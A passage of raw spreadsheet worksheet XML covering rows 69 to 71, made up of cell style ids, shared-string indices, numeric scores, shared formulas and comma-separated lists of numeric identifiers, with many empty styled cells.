      <c r="JJ69" s="127"/>
      <c r="JK69" s="127"/>
      <c r="JL69" s="127"/>
      <c r="JM69" s="127"/>
      <c r="JN69" s="127"/>
      <c r="JO69" s="127"/>
      <c r="JP69" s="127"/>
      <c r="JQ69" s="127"/>
      <c r="JR69" s="127"/>
      <c r="JS69" s="127"/>
      <c r="JT69" s="127"/>
      <c r="JU69" s="127"/>
      <c r="JV69" s="127"/>
      <c r="JW69" s="127"/>
      <c r="JX69" s="127"/>
      <c r="JY69" s="127"/>
      <c r="JZ69" s="127"/>
      <c r="KA69" s="127"/>
      <c r="KB69" s="127"/>
      <c r="KC69" s="127"/>
      <c r="KD69" s="127"/>
      <c r="KE69" s="127"/>
      <c r="KF69" s="127"/>
      <c r="KG69" s="127"/>
      <c r="KH69" s="127"/>
      <c r="KI69" s="127"/>
      <c r="KJ69" s="127"/>
      <c r="KK69" s="127"/>
      <c r="KL69" s="127"/>
      <c r="KM69" s="127"/>
      <c r="KN69" s="127"/>
      <c r="KO69" s="127"/>
      <c r="KP69" s="127"/>
      <c r="KQ69" s="127"/>
      <c r="KR69" s="127"/>
      <c r="KS69" s="127"/>
      <c r="KT69" s="127"/>
      <c r="KU69" s="127"/>
      <c r="KV69" s="127"/>
      <c r="KW69" s="127"/>
      <c r="KX69" s="127"/>
      <c r="KY69" s="127"/>
      <c r="KZ69" s="127"/>
      <c r="LA69" s="127"/>
      <c r="LB69" s="127"/>
      <c r="LC69" s="127"/>
      <c r="LD69" s="127"/>
      <c r="LE69" s="127"/>
      <c r="LF69" s="127"/>
      <c r="LG69" s="127"/>
      <c r="LH69" s="127"/>
      <c r="LI69" s="127"/>
      <c r="LJ69" s="127"/>
      <c r="LK69" s="127"/>
      <c r="LL69" s="127"/>
      <c r="LM69" s="127"/>
      <c r="LN69" s="127"/>
      <c r="LO69" s="127"/>
      <c r="LP69" s="127"/>
      <c r="LQ69" s="127"/>
      <c r="LR69" s="127"/>
      <c r="LS69" s="127"/>
      <c r="LT69" s="127"/>
      <c r="LU69" s="127"/>
      <c r="LV69" s="127"/>
      <c r="LW69" s="127"/>
      <c r="LX69" s="127"/>
      <c r="LY69" s="127"/>
      <c r="LZ69" s="127"/>
      <c r="MA69" s="127"/>
      <c r="MB69" s="127"/>
      <c r="MC69" s="127"/>
      <c r="MD69" s="127"/>
      <c r="ME69" s="127"/>
      <c r="MF69" s="127"/>
      <c r="MG69" s="127"/>
      <c r="MH69" s="127"/>
      <c r="MI69" s="127"/>
      <c r="MJ69" s="127"/>
      <c r="MK69" s="127"/>
      <c r="ML69" s="127"/>
      <c r="MM69" s="127"/>
      <c r="MN69" s="127"/>
      <c r="MO69" s="127"/>
      <c r="MP69" s="127"/>
      <c r="MQ69" s="127"/>
      <c r="MR69" s="127"/>
      <c r="MS69" s="127"/>
      <c r="MT69" s="127"/>
      <c r="MU69" s="127"/>
      <c r="MV69" s="127"/>
      <c r="MW69" s="127"/>
      <c r="MX69" s="127"/>
      <c r="MY69" s="127"/>
      <c r="MZ69" s="127"/>
      <c r="NA69" s="127"/>
      <c r="NB69" s="127"/>
      <c r="NC69" s="127"/>
      <c r="ND69" s="127"/>
      <c r="NE69" s="127"/>
      <c r="NF69" s="127"/>
      <c r="NG69" s="127"/>
      <c r="NH69" s="127"/>
      <c r="NI69" s="127"/>
      <c r="NJ69" s="127"/>
      <c r="NK69" s="127"/>
      <c r="NL69" s="127"/>
      <c r="NM69" s="127"/>
      <c r="NN69" s="127"/>
      <c r="NO69" s="127"/>
      <c r="NP69" s="127"/>
      <c r="NQ69" s="127"/>
      <c r="NR69" s="127"/>
      <c r="NS69" s="127"/>
      <c r="NT69" s="127"/>
      <c r="NU69" s="127"/>
      <c r="NV69" s="127"/>
      <c r="NW69" s="127"/>
      <c r="NX69" s="127"/>
      <c r="NY69" s="127"/>
    </row>
    <row r="70" ht="153.75" customHeight="1">
      <c r="B70" s="89" t="s">
        <v>664</v>
      </c>
      <c r="C70" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D70" s="90" t="s">
        <v>665</v>
      </c>
      <c r="E70" s="90" t="s">
        <v>1331</v>
      </c>
      <c r="F70" s="90" t="s">
        <v>1332</v>
      </c>
      <c r="G70" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H70" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I70" s="92" t="s">
        <v>1333</v>
      </c>
      <c r="J70" s="92" t="s">
        <v>1334</v>
      </c>
      <c r="K70" s="92" t="s">
        <v>1335</v>
      </c>
      <c r="L70" s="93" t="s">
        <v>12</v>
      </c>
      <c r="M70" s="93">
        <v>12.0</v>
      </c>
      <c r="N70" s="93">
        <v>1.0</v>
      </c>
      <c r="O70" s="93">
        <v>1.0</v>
      </c>
      <c r="P70" s="93">
        <v>1.0</v>
      </c>
      <c r="Q70" s="93">
        <f t="shared" si="103"/>
        <v>2</v>
      </c>
      <c r="R70" s="93">
        <v>1.0</v>
      </c>
      <c r="S70" s="93">
        <v>1.0</v>
      </c>
      <c r="T70" s="94" t="s">
        <v>565</v>
      </c>
      <c r="U70" s="156" t="s">
        <v>224</v>
      </c>
      <c r="V70" s="155" t="s">
        <v>1336</v>
      </c>
      <c r="W70" s="96" t="s">
        <v>1337</v>
      </c>
      <c r="X70" s="126" t="s">
        <v>1338</v>
      </c>
      <c r="Y70" s="126" t="s">
        <v>1339</v>
      </c>
      <c r="Z70" s="132" t="s">
        <v>1340</v>
      </c>
      <c r="AA70" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB70" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC70" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD70" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE70" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF70" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG70" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH70" s="99" t="s">
        <v>1341</v>
      </c>
      <c r="AI70" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ70" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK70" s="100" t="s">
        <v>1342</v>
      </c>
      <c r="AL70" s="100">
        <v>3.0</v>
      </c>
      <c r="AM70" s="100">
        <v>3.0</v>
      </c>
      <c r="AN70" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO70" s="100" t="s">
        <v>1342</v>
      </c>
      <c r="AP70" s="100">
        <v>3.0</v>
      </c>
      <c r="AQ70" s="100">
        <v>3.0</v>
      </c>
      <c r="AR70" s="100" t="s">
        <v>1343</v>
      </c>
      <c r="AS70" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT70" s="100" t="str">
        <f t="shared" si="149"/>
        <v>402, 1917</v>
      </c>
      <c r="AU70" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV70" s="100" t="s">
        <v>1343</v>
      </c>
      <c r="AW70" s="100">
        <v>46979.0</v>
      </c>
      <c r="AX70" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY70" s="100">
        <v>1.0</v>
      </c>
      <c r="AZ70" s="100">
        <v>1.0</v>
      </c>
      <c r="BA70" s="102">
        <v>35.0</v>
      </c>
      <c r="BB70" s="102">
        <v>2.0</v>
      </c>
      <c r="BC70" s="102">
        <v>8.0</v>
      </c>
      <c r="BD70" s="102">
        <v>8.0</v>
      </c>
      <c r="BE70" s="102">
        <v>1.0</v>
      </c>
      <c r="BF70" s="102">
        <v>0.0</v>
      </c>
      <c r="BG70" s="102">
        <v>1.0</v>
      </c>
      <c r="BH70" s="102">
        <v>1.0</v>
      </c>
      <c r="BI70" s="102">
        <v>2.0</v>
      </c>
      <c r="BJ70" s="102">
        <v>8.0</v>
      </c>
      <c r="BK70" s="102">
        <v>8.0</v>
      </c>
      <c r="BL70" s="103">
        <f t="shared" si="112"/>
        <v>2</v>
      </c>
      <c r="BM70" s="103">
        <f t="shared" si="113"/>
        <v>2</v>
      </c>
      <c r="BN70" s="103">
        <f t="shared" si="114"/>
        <v>1</v>
      </c>
      <c r="BO70" s="103">
        <f t="shared" si="115"/>
        <v>8</v>
      </c>
      <c r="BP70" s="103">
        <f t="shared" si="116"/>
        <v>8</v>
      </c>
      <c r="BQ70" s="103">
        <f t="shared" si="117"/>
        <v>1</v>
      </c>
      <c r="BR70" s="103">
        <f t="shared" si="118"/>
        <v>8</v>
      </c>
      <c r="BS70" s="103">
        <f t="shared" si="119"/>
        <v>8</v>
      </c>
      <c r="BT70" s="103">
        <f t="shared" si="120"/>
        <v>1</v>
      </c>
      <c r="BU70" s="103">
        <f t="shared" si="75"/>
        <v>0.5</v>
      </c>
      <c r="BV70" s="103">
        <f t="shared" si="76"/>
        <v>1</v>
      </c>
      <c r="BW70" s="104" t="s">
        <v>1344</v>
      </c>
      <c r="BX70" s="104">
        <v>8.0</v>
      </c>
      <c r="BY70" s="104">
        <v>13.0</v>
      </c>
      <c r="BZ70" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA70" s="104" t="s">
        <v>1344</v>
      </c>
      <c r="CB70" s="104">
        <v>8.0</v>
      </c>
      <c r="CC70" s="104">
        <v>13.0</v>
      </c>
      <c r="CD70" s="104" t="s">
        <v>1345</v>
      </c>
      <c r="CE70" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF70" s="104" t="str">
        <f t="shared" si="121"/>
        <v>402, 1917, 2041131, 2016141, 2035480</v>
      </c>
      <c r="CG70" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH70" s="104" t="s">
        <v>1345</v>
      </c>
      <c r="CI70" s="157" t="s">
        <v>1346</v>
      </c>
      <c r="CJ70" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK70" s="104">
        <v>3.0</v>
      </c>
      <c r="CL70" s="104">
        <v>3.0</v>
      </c>
      <c r="CM70" s="105">
        <v>11.0</v>
      </c>
      <c r="CN70" s="105">
        <v>6.0</v>
      </c>
      <c r="CO70" s="105">
        <v>13.0</v>
      </c>
      <c r="CP70" s="105">
        <v>8.0</v>
      </c>
      <c r="CQ70" s="105">
        <v>5.0</v>
      </c>
      <c r="CR70" s="105">
        <v>13.0</v>
      </c>
      <c r="CS70" s="105">
        <v>1.0</v>
      </c>
      <c r="CT70" s="105">
        <v>0.0</v>
      </c>
      <c r="CU70" s="105">
        <v>1.0</v>
      </c>
      <c r="CV70" s="105">
        <v>1.0</v>
      </c>
      <c r="CW70" s="105">
        <v>6.0</v>
      </c>
      <c r="CX70" s="105">
        <v>13.0</v>
      </c>
      <c r="CY70" s="105">
        <v>8.0</v>
      </c>
      <c r="CZ70" s="105">
        <v>5.0</v>
      </c>
      <c r="DA70" s="105">
        <v>13.0</v>
      </c>
      <c r="DB70" s="106">
        <f t="shared" si="122"/>
        <v>6</v>
      </c>
      <c r="DC70" s="106">
        <f t="shared" si="123"/>
        <v>6</v>
      </c>
      <c r="DD70" s="106">
        <f t="shared" si="124"/>
        <v>1</v>
      </c>
      <c r="DE70" s="106">
        <f t="shared" si="125"/>
        <v>13</v>
      </c>
      <c r="DF70" s="106">
        <f t="shared" si="126"/>
        <v>13</v>
      </c>
      <c r="DG70" s="106">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DH70" s="106">
        <f t="shared" si="127"/>
        <v>13</v>
      </c>
      <c r="DI70" s="106">
        <f t="shared" si="128"/>
        <v>13</v>
      </c>
      <c r="DJ70" s="106">
        <f t="shared" si="129"/>
        <v>1</v>
      </c>
      <c r="DK70" s="107">
        <f t="shared" si="104"/>
        <v>0.5</v>
      </c>
      <c r="DL70" s="106">
        <f t="shared" si="105"/>
        <v>1</v>
      </c>
      <c r="DM70" s="108" t="s">
        <v>1347</v>
      </c>
      <c r="DN70" s="108">
        <v>9.0</v>
      </c>
      <c r="DO70" s="108">
        <v>19.0</v>
      </c>
      <c r="DP70" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ70" s="108" t="s">
        <v>1347</v>
      </c>
      <c r="DR70" s="108">
        <v>9.0</v>
      </c>
      <c r="DS70" s="108">
        <v>19.0</v>
      </c>
      <c r="DT70" s="108" t="s">
        <v>1348</v>
      </c>
      <c r="DU70" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV70" s="108" t="str">
        <f t="shared" si="150"/>
        <v>2041131, 2016141, 2035480, 50447, 402, 1917</v>
      </c>
      <c r="DW70" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX70" s="108" t="s">
        <v>1348</v>
      </c>
      <c r="DY70" s="108" t="s">
        <v>1349</v>
      </c>
      <c r="DZ70" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA70" s="108">
        <v>3.0</v>
      </c>
      <c r="EB70" s="108">
        <v>3.0</v>
      </c>
      <c r="EC70" s="109">
        <v>35.0</v>
      </c>
      <c r="ED70" s="109">
        <v>6.0</v>
      </c>
      <c r="EE70" s="109">
        <v>13.0</v>
      </c>
      <c r="EF70" s="109">
        <v>14.0</v>
      </c>
      <c r="EG70" s="109">
        <v>5.0</v>
      </c>
      <c r="EH70" s="109">
        <v>19.0</v>
      </c>
      <c r="EI70" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ70" s="109">
        <v>0.0</v>
      </c>
      <c r="EK70" s="109">
        <v>1.0</v>
      </c>
      <c r="EL70" s="109">
        <v>1.0</v>
      </c>
      <c r="EM70" s="109">
        <v>6.0</v>
      </c>
      <c r="EN70" s="109">
        <v>13.0</v>
      </c>
      <c r="EO70" s="109">
        <v>14.0</v>
      </c>
      <c r="EP70" s="109">
        <v>5.0</v>
      </c>
      <c r="EQ70" s="109">
        <v>19.0</v>
      </c>
      <c r="ER70" s="110">
        <f t="shared" si="130"/>
        <v>6</v>
      </c>
      <c r="ES70" s="110">
        <f t="shared" si="131"/>
        <v>6</v>
      </c>
      <c r="ET70" s="110">
        <f t="shared" si="132"/>
        <v>1</v>
      </c>
      <c r="EU70" s="110">
        <f t="shared" si="133"/>
        <v>13</v>
      </c>
      <c r="EV70" s="110">
        <f t="shared" si="134"/>
        <v>13</v>
      </c>
      <c r="EW70" s="110">
        <f t="shared" si="135"/>
        <v>1</v>
      </c>
      <c r="EX70" s="110">
        <f t="shared" si="136"/>
        <v>19</v>
      </c>
      <c r="EY70" s="110">
        <f t="shared" si="137"/>
        <v>19</v>
      </c>
      <c r="EZ70" s="110">
        <f t="shared" si="138"/>
        <v>1</v>
      </c>
      <c r="FA70" s="110">
        <f t="shared" si="106"/>
        <v>0.5</v>
      </c>
      <c r="FB70" s="110">
        <f t="shared" si="107"/>
        <v>1</v>
      </c>
      <c r="FC70" s="111" t="s">
        <v>1350</v>
      </c>
      <c r="FD70" s="111">
        <v>18.0</v>
      </c>
      <c r="FE70" s="111">
        <v>39.0</v>
      </c>
      <c r="FF70" s="101" t="s">
        <v>1351</v>
      </c>
      <c r="FG70" s="111" t="s">
        <v>1352</v>
      </c>
      <c r="FH70" s="111">
        <v>14.0</v>
      </c>
      <c r="FI70" s="111">
        <v>26.0</v>
      </c>
      <c r="FJ70" s="111" t="s">
        <v>1353</v>
      </c>
      <c r="FK70" s="111" t="s">
        <v>1354</v>
      </c>
      <c r="FL70" s="111" t="str">
        <f t="shared" si="95"/>
        <v>50447, 402, 1917, 2002752, 2002749, 2041131, 2013491, 2013490, 2009768, 2100402, 2101917, 2016141, 2003595, 2035480, 2000419
</v>
      </c>
      <c r="FM70" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN70" s="111" t="s">
        <v>1355</v>
      </c>
      <c r="FO70" s="111" t="s">
        <v>1356</v>
      </c>
      <c r="FP70" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ70" s="111">
        <v>3.0</v>
      </c>
      <c r="FR70" s="111">
        <v>3.0</v>
      </c>
      <c r="FS70" s="112">
        <v>11.0</v>
      </c>
      <c r="FT70" s="112">
        <v>7.0</v>
      </c>
      <c r="FU70" s="112">
        <v>19.0</v>
      </c>
      <c r="FV70" s="112">
        <v>14.0</v>
      </c>
      <c r="FW70" s="112">
        <v>25.0</v>
      </c>
      <c r="FX70" s="112">
        <v>39.0</v>
      </c>
      <c r="FY70" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ70" s="112">
        <v>0.0</v>
      </c>
      <c r="GA70" s="112">
        <v>1.0</v>
      </c>
      <c r="GB70" s="112">
        <v>1.0</v>
      </c>
      <c r="GC70" s="112">
        <v>6.0</v>
      </c>
      <c r="GD70" s="112">
        <v>16.0</v>
      </c>
      <c r="GE70" s="112">
        <v>14.0</v>
      </c>
      <c r="GF70" s="112">
        <v>12.0</v>
      </c>
      <c r="GG70" s="112">
        <v>26.0</v>
      </c>
      <c r="GH70" s="113">
        <f t="shared" si="139"/>
        <v>7</v>
      </c>
      <c r="GI70" s="113">
        <f t="shared" si="140"/>
        <v>6</v>
      </c>
      <c r="GJ70" s="113">
        <f t="shared" si="141"/>
        <v>1</v>
      </c>
      <c r="GK70" s="113">
        <f t="shared" si="142"/>
        <v>19</v>
      </c>
      <c r="GL70" s="113">
        <f t="shared" si="143"/>
        <v>16</v>
      </c>
      <c r="GM70" s="113">
        <f t="shared" si="144"/>
        <v>1</v>
      </c>
      <c r="GN70" s="113">
        <f t="shared" si="145"/>
        <v>39</v>
      </c>
      <c r="GO70" s="113">
        <f t="shared" si="146"/>
        <v>26</v>
      </c>
      <c r="GP70" s="113">
        <f t="shared" si="147"/>
        <v>1</v>
      </c>
      <c r="GQ70" s="114">
        <f t="shared" si="108"/>
        <v>0.5</v>
      </c>
      <c r="GR70" s="113">
        <f t="shared" si="109"/>
        <v>1</v>
      </c>
      <c r="GS70" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT70" s="94" t="s">
        <v>1357</v>
      </c>
      <c r="GU70" s="130">
        <v>12449.0</v>
      </c>
      <c r="GV70" s="116">
        <v>1.0</v>
      </c>
      <c r="GW70" s="116">
        <v>1.0</v>
      </c>
      <c r="GX70" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY70" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ70" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA70" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB70" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC70" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD70" s="131">
        <v>12449.0</v>
      </c>
      <c r="HE70" s="131">
        <v>12449.0</v>
      </c>
      <c r="HF70" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG70" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH70" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI70" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ70" s="93" t="s">
        <v>1358</v>
      </c>
      <c r="HK70" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL70" s="93">
        <v>34.0</v>
      </c>
      <c r="HM70" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN70" s="93">
        <v>0.0</v>
      </c>
      <c r="HO70" s="93">
        <v>0.0</v>
      </c>
      <c r="HP70" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ70" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR70" s="118">
        <f t="shared" si="54"/>
        <v>0.5</v>
      </c>
      <c r="HS70" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT70" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU70" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV70" s="119" t="s">
        <v>1359</v>
      </c>
      <c r="HW70" s="119">
        <v>2.0</v>
      </c>
      <c r="HX70" s="119">
        <v>7.0</v>
      </c>
      <c r="HY70" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ70" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA70" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB70" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC70" s="120">
        <v>33515.0</v>
      </c>
      <c r="ID70" s="120">
        <v>33515.0</v>
      </c>
      <c r="IE70" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF70" s="120">
        <v>9999.0</v>
      </c>
      <c r="IG70" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH70" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II70" s="99" t="s">
        <v>1360</v>
      </c>
      <c r="IJ70" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK70" s="99">
        <v>8.0</v>
      </c>
      <c r="IL70" s="99">
        <v>1.0</v>
      </c>
      <c r="IM70" s="121">
        <f t="shared" si="97"/>
        <v>1</v>
      </c>
      <c r="IN70" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO70" s="98">
        <v>2.0</v>
      </c>
      <c r="IP70" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ70" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR70" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS70" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT70" s="127"/>
      <c r="IU70" s="127"/>
      <c r="IV70" s="127"/>
      <c r="IW70" s="127"/>
      <c r="IX70" s="127"/>
      <c r="IY70" s="127"/>
      <c r="IZ70" s="127"/>
      <c r="JA70" s="127"/>
      <c r="JB70" s="127"/>
      <c r="JC70" s="127"/>
      <c r="JD70" s="127"/>
      <c r="JE70" s="127"/>
      <c r="JF70" s="127"/>
      <c r="JG70" s="127"/>
      <c r="JH70" s="127"/>
      <c r="JI70" s="127"/>
      <c r="JJ70" s="127"/>
      <c r="JK70" s="127"/>
      <c r="JL70" s="127"/>
      <c r="JM70" s="127"/>
      <c r="JN70" s="127"/>
      <c r="JO70" s="127"/>
      <c r="JP70" s="127"/>
      <c r="JQ70" s="127"/>
      <c r="JR70" s="127"/>
      <c r="JS70" s="127"/>
      <c r="JT70" s="127"/>
      <c r="JU70" s="127"/>
      <c r="JV70" s="127"/>
      <c r="JW70" s="127"/>
      <c r="JX70" s="127"/>
      <c r="JY70" s="127"/>
      <c r="JZ70" s="127"/>
      <c r="KA70" s="127"/>
      <c r="KB70" s="127"/>
      <c r="KC70" s="127"/>
      <c r="KD70" s="127"/>
      <c r="KE70" s="127"/>
      <c r="KF70" s="127"/>
      <c r="KG70" s="127"/>
      <c r="KH70" s="127"/>
      <c r="KI70" s="127"/>
      <c r="KJ70" s="127"/>
      <c r="KK70" s="127"/>
      <c r="KL70" s="127"/>
      <c r="KM70" s="127"/>
      <c r="KN70" s="127"/>
      <c r="KO70" s="127"/>
      <c r="KP70" s="127"/>
      <c r="KQ70" s="127"/>
      <c r="KR70" s="127"/>
      <c r="KS70" s="127"/>
      <c r="KT70" s="127"/>
      <c r="KU70" s="127"/>
      <c r="KV70" s="127"/>
      <c r="KW70" s="127"/>
      <c r="KX70" s="127"/>
      <c r="KY70" s="127"/>
      <c r="KZ70" s="127"/>
      <c r="LA70" s="127"/>
      <c r="LB70" s="127"/>
      <c r="LC70" s="127"/>
      <c r="LD70" s="127"/>
      <c r="LE70" s="127"/>
      <c r="LF70" s="127"/>
      <c r="LG70" s="127"/>
      <c r="LH70" s="127"/>
      <c r="LI70" s="127"/>
      <c r="LJ70" s="127"/>
      <c r="LK70" s="127"/>
      <c r="LL70" s="127"/>
      <c r="LM70" s="127"/>
      <c r="LN70" s="127"/>
      <c r="LO70" s="127"/>
      <c r="LP70" s="127"/>
      <c r="LQ70" s="127"/>
      <c r="LR70" s="127"/>
      <c r="LS70" s="127"/>
      <c r="LT70" s="127"/>
      <c r="LU70" s="127"/>
      <c r="LV70" s="127"/>
      <c r="LW70" s="127"/>
      <c r="LX70" s="127"/>
      <c r="LY70" s="127"/>
      <c r="LZ70" s="127"/>
      <c r="MA70" s="127"/>
      <c r="MB70" s="127"/>
      <c r="MC70" s="127"/>
      <c r="MD70" s="127"/>
      <c r="ME70" s="127"/>
      <c r="MF70" s="127"/>
      <c r="MG70" s="127"/>
      <c r="MH70" s="127"/>
      <c r="MI70" s="127"/>
      <c r="MJ70" s="127"/>
      <c r="MK70" s="127"/>
      <c r="ML70" s="127"/>
      <c r="MM70" s="127"/>
      <c r="MN70" s="127"/>
      <c r="MO70" s="127"/>
      <c r="MP70" s="127"/>
      <c r="MQ70" s="127"/>
      <c r="MR70" s="127"/>
      <c r="MS70" s="127"/>
      <c r="MT70" s="127"/>
      <c r="MU70" s="127"/>
      <c r="MV70" s="127"/>
      <c r="MW70" s="127"/>
      <c r="MX70" s="127"/>
      <c r="MY70" s="127"/>
      <c r="MZ70" s="127"/>
      <c r="NA70" s="127"/>
      <c r="NB70" s="127"/>
      <c r="NC70" s="127"/>
      <c r="ND70" s="127"/>
      <c r="NE70" s="127"/>
      <c r="NF70" s="127"/>
      <c r="NG70" s="127"/>
      <c r="NH70" s="127"/>
      <c r="NI70" s="127"/>
      <c r="NJ70" s="127"/>
      <c r="NK70" s="127"/>
      <c r="NL70" s="127"/>
      <c r="NM70" s="127"/>
      <c r="NN70" s="127"/>
      <c r="NO70" s="127"/>
      <c r="NP70" s="127"/>
      <c r="NQ70" s="127"/>
      <c r="NR70" s="127"/>
      <c r="NS70" s="127"/>
      <c r="NT70" s="127"/>
      <c r="NU70" s="127"/>
      <c r="NV70" s="127"/>
      <c r="NW70" s="127"/>
      <c r="NX70" s="127"/>
      <c r="NY70" s="127"/>
    </row>
    <row r="71" ht="153.75" customHeight="1">
      <c r="B71" s="89" t="s">
        <v>310</v>
      </c>
      <c r="C71" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D71" s="90" t="s">
        <v>311</v>
      </c>
      <c r="E71" s="90" t="s">
        <v>1361</v>
      </c>
      <c r="F71" s="90" t="s">
        <v>1362</v>
      </c>
      <c r="G71" s="91" t="s">
        <v>12</v>
      </c>
      <c r="H71" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I71" s="92" t="s">
        <v>1363</v>
      </c>
      <c r="J71" s="92" t="s">
        <v>1364</v>
      </c>
      <c r="K71" s="92" t="s">
        <v>1365</v>
      </c>
      <c r="L71" s="93" t="s">
        <v>1366</v>
      </c>
      <c r="M71" s="93">
        <v>4.0</v>
      </c>
      <c r="N71" s="93">
        <v>1.0</v>
      </c>
      <c r="O71" s="93">
        <v>0.0</v>
      </c>
      <c r="P71" s="93">
        <v>1.0</v>
      </c>
      <c r="Q71" s="93">
        <f t="shared" si="103"/>
        <v>1</v>
      </c>
      <c r="R71" s="93">
        <v>1.0</v>
      </c>
      <c r="S71" s="93">
        <v>0.0</v>
      </c>
      <c r="T71" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U71" s="95" t="s">
        <v>475</v>
      </c>
      <c r="V71" s="96" t="s">
        <v>1367</v>
      </c>
      <c r="W71" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X71" s="97" t="s">
        <v>1368</v>
      </c>
      <c r="Y71" s="96" t="s">
        <v>1369</v>
      </c>
      <c r="Z71" s="96" t="s">
        <v>1370</v>
      </c>
      <c r="AA71" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB71" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC71" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD71" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE71" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF71" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG71" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH71" s="99" t="s">
        <v>1371</v>
      </c>
      <c r="AI71" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ71" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK71" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL71" s="100">
        <v>0.0</v>
      </c>
      <c r="AM71" s="100">
        <v>0.0</v>
      </c>
      <c r="AN71" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO71" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP71" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ71" s="100">
        <v>0.0</v>
      </c>
      <c r="AR71" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS71" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT71" s="100" t="str">
        <f t="shared" si="149"/>
        <v>-</v>
      </c>
      <c r="AU71" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV71" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW71" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX71" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY71" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ71" s="100">
        <v>0.0</v>
      </c>
      <c r="BA71" s="102">
        <v>4.0</v>
      </c>
      <c r="BB71" s="102">
        <v>0.0</v>
      </c>
      <c r="BC71" s="102">
        <v>0.0</v>
      </c>
      <c r="BD71" s="102">
        <v>0.0</v>
      </c>
      <c r="BE71" s="102">
        <v>0.0</v>
      </c>
      <c r="BF71" s="102">
        <v>0.0</v>
      </c>
      <c r="BG71" s="102">
        <v>0.0</v>
      </c>
      <c r="BH71" s="102">
        <v>0.0</v>
      </c>
      <c r="BI71" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ71" s="102">
        <v>0.0</v>
      </c>
      <c r="BK71" s="102">
        <v>0.0</v>
      </c>
      <c r="BL71" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM71" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN71" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO71" s="103">
